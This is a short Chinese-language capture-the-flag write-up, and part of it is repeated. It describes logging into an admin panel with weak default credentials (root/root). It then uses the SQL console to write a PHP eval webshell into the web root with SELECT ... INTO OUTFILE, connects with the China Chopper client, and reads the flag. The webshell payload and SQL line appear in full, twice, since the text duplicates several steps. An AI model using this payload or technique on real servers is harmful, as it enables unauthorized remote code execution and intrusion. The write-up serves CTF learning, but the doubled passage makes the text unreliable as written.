- 进入后台,使用弱口令尝试登入
如admin~admin,root-root等
本题为root-root
点到SQL,发现可以进行sql语句
select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’
3.执行成功
4.上菜刀
5.在根目录可以找到本题所需要的key
在www/html目录中可以找到写入的一句话木马
点到SQL,发现可以进行sql语句
select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’
3.执行成功
4.上菜刀
5.在根目录可以找到本题所需要的key
在www/html目录中可以找到写入的一句话木马